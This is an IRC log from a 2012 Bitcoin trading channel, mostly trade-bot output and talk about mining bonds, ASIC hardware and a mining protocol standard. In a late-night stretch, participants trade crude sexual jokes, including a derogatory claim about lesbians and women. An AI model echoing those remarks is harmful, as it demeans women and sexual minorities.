[FPGAMINING] 10 @ 0.56 = 5.6 BTC [-] Sep 18 01:11:17 [GLBSE] [FPGAMINING] 12 @ 0.55995 = 6.7194 BTC [-] Sep 18 01:11:18 [GLBSE] [FPGAMINING] 7 @ 0.52 = 3.64 BTC [-] Sep 18 01:12:01 [GLBSE] [OBSI.HRPT] 15 @ 0.1028 = 1.542 BTC [-] Sep 18 01:12:09 That's better. All non-asic things should drop at around 0.01 per mhash Sep 18 01:12:15 and less Sep 18 01:12:26 0.01 is a bit expensive Sep 18 01:13:08 BTC-Mining https://bitcointalk.org/index.php?topic=75802.msg1181688#msg1181688 Sep 18 01:13:56 why the fuck do you not have smoothie on ignore Sep 18 01:14:28 dude does not have two brain cells to rub together Sep 18 01:14:53 oh... you got out of Pirate before it closed? Sep 18 01:14:56 [GLBSE] [OBSI.HRPT] 19 @ 0.1028 = 1.9532 BTC [-] Sep 18 01:14:57 [GLBSE] [OBSI.ABMO] 4 @ 0.1 = 0.4 BTC [+] Sep 18 01:15:02 BTC-Mining NO Sep 18 01:15:32 dub i do have him on ignore Sep 18 01:15:36 after that post Sep 18 01:16:01 Then why =/ Sep 18 01:16:51 because i met pirate in vegas i guess Sep 18 01:17:09 I mean, I think the upgrade price is bad (We pay you the highest cut possible in prevision of the worst case scenario, no matter if that's required.) Sep 18 01:17:20 But that doesn't make you a scammer. Sep 18 01:17:53 Especially since BS&T and GIGAMINING are completly unrelated, it seems. Sep 18 01:18:42 Although I'd expect people to complain about anyone who encouraged/reviewed pirate positively. Sep 18 01:18:53 [GLBSE] [ASICMINER] 12 @ 0.118759 = 1.4251 BTC [+] Sep 18 01:18:55 [GLBSE] [ASICMINER] 6 @ 0.118859 = 0.7132 BTC [+] Sep 18 01:18:56 [GLBSE] [ASICMINER] 10 @ 0.11896 = 1.1896 BTC [+] Sep 18 01:19:00 If you provide a professional level of quality in your mining operation, you are entitled to professional management fees IMHO Sep 18 01:19:45 Bugpowder: there's professional fees and there's maximal fees Sep 18 01:20:15 Those are usually equal in a free market Sep 18 01:20:32 expect Vanguard Sep 18 01:21:42 Planning for reduced mining returns and all kind of possible mess years in the future, there's a 55-70% cut that will be taken by gigavps. It might be eventually needed but I expect it will not. Sep 18 01:22:04 BTC-Mining the worst is out of the way Sep 18 01:22:21 and that Gigavps will be left with a 15-25% cut. It might be wrong, only time will tell. Sep 18 01:22:33 things can only stay the same or improve from here Sep 18 01:22:41 Indeed. Sep 18 01:22:57 Smoovious as for the conspiracy theory Sep 18 01:22:59 If everything is smooth, everyone would appreciate increased PPS Sep 18 01:23:08 i'll have 200Gh in two weeks Sep 18 01:23:13 [GLBSE] [PUREMINING] 2 @ 0.096 = 0.192 BTC [+] Sep 18 01:23:15 all ASIC upgrades are paid for Sep 18 01:23:24 on my end anyway Sep 18 01:23:32 But like gigavps, I expected around 10% for hosting and maintenance of the equipment. Sep 18 01:23:46 it's just a waiting game for BFL to deliver Sep 18 01:23:59 And a far larger cut for renewing/replacement Sep 18 01:24:25 BTC-Mining will never let this go Sep 18 01:24:26 All I want is gigavps to get his rigs up before anyone, in early Nov. Boom, fee paid off in one month Sep 18 01:24:35 if the date slips though... Sep 18 01:24:35 [GLBSE] [ASICMINER] 2 @ 0.11886 = 0.2377 BTC [-] Sep 18 01:24:37 crappy Sep 18 01:24:52 :) Sep 18 01:25:48 first time is always free Sep 18 01:26:58 Hahaha, sorry, nothing personal Sep 18 01:27:15 yeah, the forums can be a bit exasperating at times Sep 18 01:28:05 It's that it seems taking a large cut to cover all risks when those risks may not happen at all, is a bit disadvantageous for the shareholder. Sep 18 01:28:44 I don't like guaranteed X, you have to pay for all the risks to have it guaranteed, even if it never happens. Sep 18 01:29:01 I like taking all risks, but diversify the portfolio Sep 18 01:29:10 [GLBSE] [GIGAMINING] 2 @ 0.5998799 = 1.1998 BTC [+] Sep 18 01:29:11 [GLBSE] [GIGAMINING] 2 @ 0.59987999 = 1.1998 BTC [+] Sep 18 01:29:13 [GLBSE] [GIGAMINING] 6 @ 0.59988 = 3.5993 BTC [+] Sep 18 01:29:14 [GLBSE] [GIGAMINING] 3 @ 0.59989 = 1.7997 BTC [+] Sep 18 01:29:14 [GLBSE] [GIGAMINING] 65 @ 0.6 = 39 BTC [+] Sep 18 01:29:31 Maximum returns, if one goes partially busted, I still have other stocks. Sep 18 01:29:54 nomnomnom Sep 18 01:29:59 portfolio diversity requires uncorrelated asset classes Sep 18 01:30:09 buying a bunch of mining stocks... hmmm pretty correlate Sep 18 01:30:13 corredlated Sep 18 01:30:16 grrh Sep 18 01:30:19 Aye, for that, yes =/ Sep 18 01:30:21 correlated Sep 18 01:30:42 Paying for guaranteed, you usually get less. Unless you put all eggs in the same basket. Then the guarantee might be preferable. Sep 18 01:30:57 https://bitcointalk.org/index.php?topic=98517.msg1199127#msg1199127 Sep 18 01:31:41 seems gigamining is the only mining bond that if you bought in on the IPO you would still have a positive return Sep 18 01:32:01 and i'm not sure mining bonds are the problem, it's how you invest in them... Sep 18 01:32:22 gigavps: what did gigamining ipo at? Sep 18 01:32:29 BTC-MINING 1 0.250579 0.8 +0.050579 (+5%) Sep 18 01:32:42 smickles 1 BTC Sep 18 01:32:44 !pl gigamining 1 Sep 18 01:32:45 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 01:32:47 That's only because the very recent trades were low Sep 18 01:32:55 GIGAMINING [1@1BTC] paid: 0.45625096 BTC. Last price: 0.6 BTC. Capital gain: -0.4 BTC. Total: 0.05625096 BTC. (5.6%) Sep 18 01:33:10 Someone sold a pack of shares and not many bids Sep 18 01:33:14 5.6, not bad Sep 18 01:33:22 :) Sep 18 01:33:25 We're more like +25% Sep 18 01:33:33 [GLBSE] [DMC] 1 @ 0.07 BTC [-] Sep 18 01:33:40 good for you BTC-Mining, keep selling those shares Sep 18 01:33:46 competition is health Sep 18 01:33:48 gigavps: wanna see a lucky one? Sep 18 01:33:54 [GLBSE] [OBSI.HRPT] 4 @ 0.1028 = 0.4112 BTC [-] Sep 18 01:33:57 !pl mpoe.etf .1 Sep 18 01:33:57 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 01:34:04 Bugpowder the "not observed" is mostly due to the tiny ammt stocks pay in dividend these days Sep 18 01:34:05 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 1.33 BTC. Capital gain: 1.23 BTC. Total: 1.25470282 BTC. (1254.7%) Sep 18 01:34:05 [MPEX] [S.MPOE] 9100 @ 0.00040699 = 3.7036 BTC [-] Sep 18 01:34:08 less than .1% Sep 18 01:34:17 whoa Sep 18 01:34:25 :) Sep 18 01:34:43 Most have negative profit strictly because they IPOed right before FPGA then ASIC news. Sep 18 01:35:02 We kind of fast jumped forward 2 steps to the final technology step that is ASIC. Sep 18 01:35:45 BTC-Mining if you think this is the end, i wouldn't place a bet on that Sep 18 01:35:53 I also have one that !pl doesn't report properly Sep 18 01:36:01 because of a 100 for 1 split Sep 18 01:36:08 The end? I don't think it's the end Sep 18 01:36:14 What do you mean? Sep 18 01:36:48 asic can still double every 18 months Sep 18 01:37:05 i'm sure no asic manufacturer is using 45nm or 28nm Sep 18 01:37:10 Smoovious: no it's not, it allows for more liquidity :) Sep 18 01:37:11 asic prolly will double every 18 months for a decade, yes. Sep 18 01:37:12 Smoovious: people wanted to buy, but the price was too high for them to maintain the portfolio ratio that they wanted Sep 18 01:37:15 so there is still a lot of room for improvement Sep 18 01:37:20 So does CPU/GPU, theorically Sep 18 01:37:36 Although for mining BTC, GPU seems to have stayed stable Sep 18 01:37:45 Smoovious: and it proved to be true, the price jumped after the split Sep 18 01:37:49 only their graphical computation went up =P Sep 18 01:38:00 !pl mpoe.etf Sep 18 01:38:00 !pl [@] [] Sep 18 01:38:04 !pl mpoe.etf .1 Sep 18 01:38:05 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 01:38:15 mircea_popescu: Average SP500 Dividend yield is around 2%. I was not misinformed. Sep 18 01:38:16 But yes, doubling performance every 18 months is an acceptable increase Sep 18 01:38:19 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 1.33 BTC. Capital gain: 1.23 BTC. Total: 1.25470282 BTC. (1254.7%) Sep 18 01:38:30 still 1250% i see. Sep 18 01:38:37 But GPU > ASIC in a year... Sep 18 01:38:37 well there you have it, best performing asset in btc history. Sep 18 01:38:53 mircea_popescu: it'll be like that until that ask wall is eaten Sep 18 01:39:00 It's like x20 the hashing for less power usage... Sep 18 01:39:19 smickles how much is left ? Sep 18 01:39:21 That's a killer for all fixed mhash GPU based mining ops Sep 18 01:39:36 mircea_popescu: about 180 shares Sep 18 01:39:42 not so bad. Sep 18 01:40:17 I feel like all ive done is replace hardware Sep 18 01:40:36 Replaced my gpu with fpga, replacing m fpga with asic. Sep 18 01:40:56 Should have just kept the gpu space heaters Sep 18 01:41:33 The fpga have been a lot better than the gpus almost no maintenance to run Sep 18 01:42:32 fpga's have spoiled me Sep 18 01:42:37 By the way, who wanted something to order the tables on GLBSE automatically? I ported tablesorter.com's table script to a bookmarklet Sep 18 01:43:19 Unfortunatly, no sorter will work until Nefario puts the tablehead row inside tags Sep 18 01:43:53 A few tables have no thead section (unfortunatly, the portfolio page + the market page) Sep 18 01:44:03 Which would be the important ones to sort. Sep 18 01:44:19 I'll ask nef to correct that on those 2 pages. Sep 18 01:44:25 Otherwise, it works. Sep 18 01:44:41 Instead sorting for all tables with a thead. Sep 18 01:44:42 meh, valid html Sep 18 01:44:53 BTC-Mining add them with javascript Sep 18 01:44:55 :) Sep 18 01:45:25 Bah, it's a quick fix for nefario and I'm sure he'll add those... Sep 18 01:45:41 BTC-Mining you are like Luke-Jr Sep 18 01:45:52 ? Sep 18 01:45:59 he likes to make other people fix their problems rather than just making it work Sep 18 01:46:18 Technically, nefario put the table heads in other places Sep 18 01:46:34 lol Sep 18 01:46:38 He seems to have forgotten it around certain tables. Sep 18 01:46:38 fuck html Sep 18 01:46:40 get over it Sep 18 01:47:35 But I need a table head to sort the table! Sep 18 01:47:43 nah Sep 18 01:47:53 you need a few lines of js as giga said Sep 18 01:48:03 python doesn't need a thead to sort ;) Sep 18 01:49:13 Python can't be applied to bookmarklets >.> Sep 18 01:49:31 gigavps: what? no FUD please Sep 18 01:49:33 how much of S.MPOE's success is due to it basically being the only stock with the liquidity to daytrade? Sep 18 01:50:21 It's nicer to have a clickable table head to sort the columns. Sep 18 01:50:39 Bugpowder: probably a significant factor Sep 18 01:50:41 Especially since the tableheads are like normal rows currently. Sep 18 01:50:48 Luke-Jr facts, all facts :) Sep 18 01:50:53 They'd preferably stay at the top... Sep 18 01:51:02 gigavps: what facts? Sep 18 01:51:04 Not get sorted with the rest Sep 18 01:51:29 he likes to make other people fix their problems rather than just making it work <<< this is how it should be done. Sep 18 01:51:40 omfg BTC-Mining write an exception Sep 18 01:51:41 Luke-Jr nevermind, sorry to bother Sep 18 01:51:49 Bugpowder: just the other day, there was a selloff in the range of 500-1000btc and it only moved down about .2% or somehting Sep 18 01:52:02 I don't squat about javascript =/ Sep 18 01:52:14 I don't know* Sep 18 01:52:25 o Sep 18 01:52:32 that might be a problem Sep 18 01:52:38 you will be better of learning it than whining here about Sep 18 01:52:39 mircea_popescu: well, I try to help people who are having problems with their stuff, and sometimes there are things I can do to workaround them :P Sep 18 01:53:14 !ticker s.mpoe Sep 18 01:53:14 [MPEX:S.MPOE] 1day: 0.00039501 / 0.00040576 / 0.00040708 (1853675 shares, 752.16 BTC), 30day: 0.000035 / 0.00038659 / 0.00042 (71854487 shares, 27,778.26 BTC) Sep 18 01:53:32 and it's recovered from that sell off since Sep 18 01:53:33 Luke-Jr good policy. Sep 18 01:53:58 smickles im not so sure how much daytrading one can do on .2% movements Sep 18 01:54:06 I just happened to be able to convert an existing tablesorter a bit so it get included on the page + get the class appended to all tables for styling + get all tables executing the sorting script. Sep 18 01:54:17 Was pretty basic to get going. Sep 18 01:54:32 mircea_popescu: i assumed a liberal interpretation of 'day trading' Sep 18 01:54:40 = "dick about" ? Sep 18 01:54:55 !ticker f.giga.etf Sep 18 01:54:56 [MPEX:F.GIGA.ETF] 1day: 0.00028 / 0.00033284 / 0.0004 (1024225 shares, 340.91 BTC), 30day: 0.00028 / 0.00069058 / 0.00108895 (13027816 shares, 8,996.83 BTC) Sep 18 01:55:02 mircea_popescu: for example, the Windows CDC driver has some problem with MMQ FPGAs, and there's not much Windows users can do about that, so I implemented a workaround to detect and recover from it Sep 18 01:55:07 actually... that's pretty liquid too Sep 18 01:55:21 But if everyone would respect standard, it wouldn't be an issue as all table heads would be correctly formatted... standards are there so we don't have to implement a different hack for everything... Sep 18 01:55:33 Luke-Jr that's a nice thing to do. supporting windows is a pain. Sep 18 01:55:36 BTC-Mining: tell that to slush and BTCGuild ;) Sep 18 01:55:38 Anyone remember the early browser wars, poor standards? Sep 18 01:55:46 lol Sep 18 01:55:46 IE6? Sep 18 01:55:53 this is ridiculus. Sep 18 01:56:22 I'm very pro-standards... Sep 18 01:57:07 http://imgs.xkcd.com/comics/standards.png Sep 18 01:57:24 BTC-Mining: the Bitcoin developer community spent a few months ironing out a new mining protocol standard earlier this year, and instead of adopting it, slush and BTCGuild decided they were going to reinvent it in an incompatible way :< Sep 18 01:57:24 as long as it renders correctly ;) Sep 18 01:57:54 lol Sep 18 01:58:03 each of them was workin on their own solution Sep 18 01:58:09 that tought it was different from eachones Sep 18 01:58:10 Luke-Jr arguably this is good, that miners shouldn't standardise. Sep 18 01:58:20 then slush brought it up to light Sep 18 01:58:23 [GLBSE] [GIGAMINING] 5 @ 0.62089999 = 3.1045 BTC [+] Sep 18 01:58:25 [GLBSE] [GIGAMINING] 85 @ 0.621 = 52.785 BTC [+] Sep 18 01:58:27 btcguild accepted Sep 18 01:58:33 eleutheria or whatever Sep 18 01:58:41 kakobrekla: except we had an accepted standard already long before all that :p Sep 18 01:58:43 Aye, but HTML/CSS/Rendinring specifications are far more solid Sep 18 01:58:50 you had it Sep 18 01:58:57 kakobrekla: we had it. the community. Sep 18 01:59:03 And there's not multiple different standards. Sep 18 01:59:12 !lp gigamining Sep 18 01:59:22 !pl gigamining Sep 18 01:59:23 !pl [@] [] Sep 18 01:59:34 !pl GIGAMINING Sep 18 01:59:34 !pl [@] [] Sep 18 01:59:38 look Luke-Jr i feel you feel bad about this but bitching now wont help Sep 18 01:59:49 !pl gigamining 1 Sep 18 01:59:50 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 01:59:53 GIGAMINING [1@1BTC] paid: 0.45625096 BTC. Last price: 0.621 BTC. Capital gain: -0.379 BTC. Total: 0.07725096 BTC. (7.7%) Sep 18 02:00:04 [MPEX] [F.GIGA.ETF] 6981 @ 0.00030086 = 2.1003 BTC [+] Sep 18 02:00:06 [MPEX] [F.GIGA.ETF] 7421 @ 0.0003 = 2.2263 BTC [-] Sep 18 02:00:20 hopefully ASICs will rewrite the top-N-pool-list so their pools no longer have a position to abuse Sep 18 02:00:30 lol Sep 18 02:00:35 like a fuckin kid. Sep 18 02:02:05 i'm sorry guys Sep 18 02:02:08 this is my fault Sep 18 02:02:11 yes it is Sep 18 02:03:19 Hopefully with larger miner with ASICs like Gigavps and all the other asic farms, even if it's more centralized, at least miners might be smart enough to just move pool if large pools attempt to mess around again. Sep 18 02:05:41 BTC-Mining ? Sep 18 02:05:46 mess around? Sep 18 02:05:51 again? Sep 18 02:05:58 wha wherE? Sep 18 02:07:39 kakobrekla: you should make assbot respond to PMs Sep 18 02:07:48 i could. Sep 18 02:08:01 !pl obsi.1mhs 0.1 Sep 18 02:08:01 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 02:08:29 OBSI.1MHS [1@0.1BTC] paid: 0.05534983 BTC. Last price: 0.1 BTC. Capital gain: 0 BTC. Total: 0.05534983 BTC. (55.3%) Sep 18 02:08:38 No, I'm saying miners should boycott pools messing with proposed standards... Sep 18 02:08:50 mircea_popescu: i'm naming this hardcore teraria character after you. I'll let you know how you die Sep 18 02:09:01 teraria ?! Sep 18 02:09:05 Haha Sep 18 02:10:16 !pl obsi.hrpt 0.1 Sep 18 02:10:16 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 02:10:22 OBSI.HRPT [1@0.1BTC] paid: 0.063745 BTC. Last price: 0.1028 BTC. Capital gain: 0.0028 BTC. Total: 0.066545 BTC. (66.5%) Sep 18 02:10:38 Will his love interest be the MPOE-PR chick? Sep 18 02:10:40 kakobrekla, is there a place I read read more about this new mining protocol and what the pools did instead? Sep 18 02:11:40 BTC-Mining https://bitcointalk.org/index.php?topic=108533.0 Sep 18 02:11:49 [GLBSE] [RSM] 2 @ 0.20500001 = 0.41 BTC [-] Sep 18 02:11:49 sry for spam peoples... 2 more Sep 18 02:11:50 [GLBSE] [RSM] 4 @ 0.205 = 0.82 BTC [-] Sep 18 02:11:51 [GLBSE] [RSM] 4 @ 0.2 = 0.8 BTC [-] Sep 18 02:11:54 !pl obsi.abmo 0.1 Sep 18 02:11:54 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 02:11:59 OBSI.ABMO [1@0.1BTC] paid: 0.00260791 BTC. Last price: 0.1 BTC. Capital gain: 0 BTC. Total: 0.00260791 BTC. (2.6%) Sep 18 02:12:14 Obsi Sep 18 02:12:22 You can query assbot directly I believe Sep 18 02:12:22 !pl futurefund 0.0001 Sep 18 02:12:23 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 02:12:28 he cant. Sep 18 02:12:32 already tried Sep 18 02:12:33 ill add it. Sep 18 02:12:36 oh =/ Sep 18 02:12:38 FUTUREFUND [1@0.0001BTC] paid: 2.06E-5 BTC. Last price: 0.00012936 BTC. Capital gain: 2.936E-5 BTC. Total: 4.996E-5 BTC. (50%) Sep 18 02:12:54 Well make it so the bot replies in query when asked in query =/ Sep 18 02:14:07 [GLBSE] [TYGRR.BOND-P] 50 @ 0.1 = 5 BTC [+] Sep 18 02:14:08 Doffx: love interest? that's ciuciu http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Sep 18 02:14:41 [GLBSE] [FOO.PPPPT] 5 @ 0.089999 = 0.45 BTC [+] Sep 18 02:15:06 [GLBSE] [PUREMINING] 2 @ 0.09360011 = 0.1872 BTC [-] Sep 18 02:15:08 [GLBSE] [PUREMINING] 10 @ 0.0936001 = 0.936 BTC [-] Sep 18 02:15:09 [GLBSE] [PUREMINING] 5 @ 0.0936 = 0.468 BTC [-] Sep 18 02:15:10 [GLBSE] [PUREMINING] 30 @ 0.0936 = 2.808 BTC [-] Sep 18 02:15:10 LOL Sep 18 02:16:17 presenting mircea_popescu http://i.imgur.com/TFDc3.png Sep 18 02:16:23 [GLBSE] [PUREMINING] 10 @ 0.0936 = 0.936 BTC [-] Sep 18 02:16:47 lol gl to me Sep 18 02:17:31 [GLBSE] [OBSI.HRPT] 8 @ 0.1027 = 0.8216 BTC [-] Sep 18 02:17:45 BTC-Mining: well, the only ASIC-capable miner right now is GBT anyway, so hopefully it won't come to that\ Sep 18 02:19:44 shit Sep 18 02:19:52 mircea_popescu didn't bounce Sep 18 02:20:26 wow, 3 minutes. that was unlucky Sep 18 02:21:48 btw Sep 18 02:22:04 lots of spam bot users on encyclopediabitcoinica Sep 18 02:22:29 whoever runs it fix registration Sep 18 02:24:10 [GLBSE] [OBSI.HRPT] 5 @ 0.1027 = 0.5135 BTC [-] Sep 18 02:25:21 +IOCoin powder. Odorless, valueless, and amongst one of the more deadly poisons known to man. Sep 18 02:25:25 hilarious Sep 18 02:25:29 What's GBT? Sep 18 02:25:33 [MPEX] [F.GIGA.ETF] 3000 @ 0.0003 = 0.9 BTC [-] Sep 18 02:29:00 [GLBSE] [OBSI.HRPT] 15 @ 0.1027 = 1.5405 BTC [-] Sep 18 02:30:34 [GLBSE] [OBSI.HRPT] 1 @ 0.1027 BTC [-] Sep 18 02:35:39 [GLBSE] [FPGAMINING] 7 @ 0.5201 = 3.6407 BTC [+] Sep 18 02:35:40 [GLBSE] [FPGAMINING] 6 @ 0.52 = 3.12 BTC [-] Sep 18 02:35:41 [GLBSE] [FPGAMINING] 6 @ 0.516 = 3.096 BTC [-] Sep 18 02:35:42 [GLBSE] [FPGAMINING] 9 @ 0.511 = 4.599 BTC [-] Sep 18 02:35:43 [GLBSE] [FPGAMINING] 2 @ 0.51000011 = 1.02 BTC [-] Sep 18 02:36:13 [GLBSE] [BIB.PIRATE] 100 @ 0.07 = 7 BTC [+] Sep 18 02:36:15 [GLBSE] [BIB.PIRATE] 10 @ 0.05 = 0.5 BTC [-] Sep 18 02:37:24 BTC-Mining: getblocktemplate, standardised protocol for decentralized Bitcoin mining Sep 18 02:37:38 BTC-Mining: but I meant BFGMiner up there ^^ Sep 18 02:37:52 BFGMiner, which supports GBT* Sep 18 02:41:12 oh Sep 18 02:46:41 [GLBSE] [MOORE] 4 @ 0.5 = 2 BTC [+] Sep 18 02:48:40 [GLBSE] [BFLS.RIG] 1 @ 0.801 BTC [-] Sep 18 02:49:15 [GLBSE] [BFLS.RIG] 2 @ 0.71 = 1.42 BTC [-] Sep 18 02:49:42 [GLBSE] [BFLS.RIG] 2 @ 0.705 = 1.41 BTC [-] Sep 18 02:50:20 [GLBSE] [BFLS.RIG] 4 @ 0.62 = 2.48 BTC [-] Sep 18 02:51:00 [GLBSE] [BFLS.RIG] 1 @ 0.601 BTC [-] Sep 18 02:51:04 [MPEX] [F.GIGA.ETF] 14055 @ 0.0003 = 4.2165 BTC [-] Sep 18 02:54:16 [GLBSE] [NYAN.C] 1 @ 0.3502 BTC [-] Sep 18 02:54:18 [GLBSE] [NYAN.C] 1 @ 0.3501 BTC [-] Sep 18 02:54:19 [GLBSE] [NYAN.C] 1 @ 0.35 BTC [-] Sep 18 02:56:30 [GLBSE] [SS] 15 @ 0.0255 = 0.3825 BTC [+] Sep 18 02:57:21 holy shit Sep 18 02:57:23 usagi isnt online Sep 18 02:57:27 ITS THE END OF DAYS Sep 18 03:00:59 [GLBSE] [SS] 5 @ 0.02649 = 0.1325 BTC [+] Sep 18 03:02:29 [GLBSE] [NYAN.C] 10 @ 0.3 = 3 BTC [-] Sep 18 03:02:30 [GLBSE] [NYAN.C] 26 @ 0.3 = 7.8 BTC [-] Sep 18 03:06:11 Luke-Jr is all about Gay Bisexual Transgender equality Sep 18 03:06:32 <[\\\]> what about the lesbians Sep 18 03:06:37 <[\\\]> everyone needs a lesbian or two Sep 18 03:06:46 there are no lesbians Sep 18 03:06:51 all women wnat cock Sep 18 03:07:00 [GLBSE] [MMM] 1 @ 0.76 BTC [-] Sep 18 03:07:01 [GLBSE] [MMM] 5 @ 0.75 = 3.75 BTC [-] Sep 18 03:07:14 dub: That's why most would be lesbians say they are bi Sep 18 03:07:15 what about transexuals Sep 18 03:07:57 jcpham: It seems there is not much love out there for transexuals Sep 18 03:08:00 I believe transgender is the correct term Sep 18 03:08:49 The medical technology needs improvement Sep 18 03:08:57 I humbly defer to your expertise Sep 18 03:09:59 I want to see new forms of sexual organs put on the human body Sep 18 03:10:05 We'll call it neo-gender Sep 18 03:10:22 Orgasms with no boundaries Sep 18 03:10:28 never seen bmezine? Sep 18 03:11:11 Yes Sep 18 03:11:14 but Sep 18 03:11:17 it's just homemade Sep 18 03:11:19 crude Sep 18 03:11:26 pain-ridden Sep 18 03:11:32 unspeakable Sep 18 03:11:35 things Sep 18 03:11:54 The penis guillotine article I once read Sep 18 03:12:07 I was just shocked Sep 18 03:12:20 penis guillotine would be an excellent glbse asset name Sep 18 03:12:31 maybe mpex Sep 18 03:12:33 thats nothing on the scrotal re-routing and shit Sep 18 03:12:39 Ooo Sep 18 03:12:43 Now that's interesting Sep 18 03:12:46 but its been a long time since I looked Sep 18 03:13:00 Yeah, last I checked, it was just recreational pain. Sep 18 03:14:38 irc cracks me up every night Sep 18 03:15:44 trewls be trewlin Sep 18 03:18:26 [GLBSE] [HYDRO.BONDS] 4 @ 1.3421 = 5.3684 BTC [-] Sep 18 03:18:48 [GLBSE] [PPT.E] 1 @ 0.32 BTC [-] Sep 18 03:22:10 [GLBSE] [OBSI.HRPT] 1 @ 0.1027 BTC [-] Sep 18 03:23:04 [GLBSE] [HYDRO.BONDS] 4 @ 1.342 = 5.368 BTC [-] Sep 18 03:24:04 [MPEX] [F.GIGA.ETF] 803 @ 0.0003 = 0.2409 BTC [-] Sep 18 03:24:07 [GLBSE] [RSM] 1 @ 0.29999999 BTC [+] Sep 18 03:27:32 [GLBSE] [FUTUREFUND] 90 @ 0.00012936 = 0.0116 BTC [+] Sep 18 03:30:42 [GLBSE] [BBBB] 5 @ 0.000199 = 0.001 BTC [-] Sep 18 03:36:13 [GLBSE] [DI.BFLSC.FAIL] 7 @ 0.001 = 0.007 BTC [+] Sep 18 03:43:22 [GLBSE] [OBSI.HRPT] 2 @ 0.1027 = 0.2054 BTC [-] Sep 18 03:44:22 Bane_Capital jcpham & co : http://polimedia.us/dtng/b/src/132890101884.png Sep 18 03:44:41 [GLBSE] [TCC] 1 @ 0.0001 BTC [-] Sep 18 03:46:32 [GLBSE] [MOORE] 4 @ 0.5044 = 2.0176 BTC [+] Sep 18 03:46:32 [GLBSE] [MOORE] 16 @ 0.505 = 8.08 BTC [+] Sep 18 03:46:45 nice herbarium. Sep 18 03:48:29 mircea_popescu, ... Sep 18 03:48:59 yes, this is mircea_popescu Sep 18 03:49:03 I have to remember to read your link first, I read kakobrekla comment and though it was a grow op. Sep 18 03:49:21 whut da fuck Sep 18 03:49:31 lol, that was my reaction too. Sep 18 03:50:01 it's the set item for the penis guillotine Sep 18 03:50:05 I'm bored tonight guys, what should I do? Sep 18 03:50:08 flat dick, could be an asset. Sep 18 03:50:09 hmmmm... Sep 18 03:50:20 [GLBSE] [BITBOND] 14 @ 0.2997 = 4.1958 BTC [-] Sep 18 03:50:22 ass etc. Sep 18 03:50:22 [GLBSE] [BITBOND] 22 @ 0.2998 = 6.5956 BTC [+] Sep 18 03:50:36 maybe I'll flatten my dick Sep 18 03:51:03 [MPEX] [F.GIGA.ETF] 3800 @ 0.0003 = 1.14 BTC [-] **** BEGIN LOGGING AT Tue Sep 18 14:04:34 2012 Sep 18 14:08:56 [GLBSE] [FPGAMINING] 1 @ 0.59 BTC [+] Sep 18 14:09:26 [GLBSE] [METAL.SILVER] 1 @ 0.09 BTC [-] Sep 18 14:16:47 http://www.space.com/17628-warp-drive-possible-interstellar-spaceflight.html Sep 18 14:16:53 this would so end economic crisis... Sep 18 14:21:03 [MPEX] [F.GIGA.ETF] 8955 @ 0.00029 = 2.597 BTC [-] Sep 18 14:21:05 [MPEX] [F.GIGA.ETF] 3879 @ 0.00028947 = 1.1229 BTC [-] Sep 18 14:23:02 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.34639982 = 346.3998 BTC [-] Sep 18 14:24:03 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.25843449 = 258.4345 BTC [-] Sep 18 14:25:49 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.17943463 = 179.4346 BTC [-] Sep 18 14:26:44 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.11327344 = 113.2734 BTC [-] Sep 18 14:29:42 mornin. Sep 18 14:32:29 heya Sep 18 14:33:13 sup Sep 18 14:35:46 not much. Sep 18 14:35:48 pirate paid. Sep 18 14:35:55 lol? Sep 18 14:35:57 :D Sep 18 14:41:24 [GLBSE] [GSDPT] 10 @ 0.003389 = 0.0339 BTC [-] Sep 18 14:43:51 [GLBSE] [FPGAMINING] 1 @ 0.59 BTC [+] Sep 18 14:43:53 [GLBSE] [FPGAMINING] 5 @ 0.6 = 3 BTC [+] Sep 18 14:45:01 [GLBSE] [FPGA.CONTRACT] 10 @ 0.052552 = 0.5255 BTC [-] Sep 18 14:45:02 [GLBSE] [FPGA.CONTRACT] 10 @ 0.052551 = 0.5255 BTC [-] Sep 18 14:45:04 [GLBSE] [FPGA.CONTRACT] 4 @ 0.05255 = 0.2102 BTC [-] Sep 18 14:45:05 [GLBSE] [FPGA.CONTRACT] 2 @ 0.05250011 = 0.105 BTC [-] Sep 18 14:45:06 [GLBSE] [FPGA.CONTRACT] 4 @ 0.051 = 0.204 BTC [-] Sep 18 14:45:21 ;;tslb Sep 18 14:45:24 Time since last block: 5 minutes and 48 seconds Sep 18 14:45:31 o, Completed txs vol: 1000 BTC Sep 18 14:46:37 [GLBSE] [OBSI.HRPT] 3 @ 0.10299999 = 0.309 BTC [+] Sep 18 14:47:49 [GLBSE] [OBSI.HRPT] 13 @ 0.103 = 1.339 BTC [+] Sep 18 14:47:58 [GLBSE] [BIF.1YR.LOAN] 3 @ 0.92307692 = 2.7692 BTC [-] Sep 18 14:54:02 [MPEX] [S.MPOE] 16500 @ 0.00040699 = 6.7153 BTC [+] Sep 18 14:58:07 http://xkcd.com/1109/ Sep 18 14:58:09 haha win Sep 18 15:21:03 [MPEX] [F.GIGA.ETF] 5121 @ 0.00028947 = 1.4824 BTC [-] Sep 18 15:21:05 [MPEX] [F.GIGA.ETF] 2279 @ 0.00028942 = 0.6596 BTC [-] Sep 18 15:21:54 anyone know how to get a hold of brendio? Sep 18 15:22:06 aside from the email on his gpg key Sep 18 15:27:48 [GLBSE] [ASICMINER] 15 @ 0.11868989 = 1.7803 BTC [+] Sep 18 15:41:42 [GLBSE] [BFLS] 1 @ 0.8 BTC [-] Sep 18 15:42:02 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.11231971 = 112.3197 BTC [-] Sep 18 15:43:02 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.17828241 = 178.2824 BTC [-] 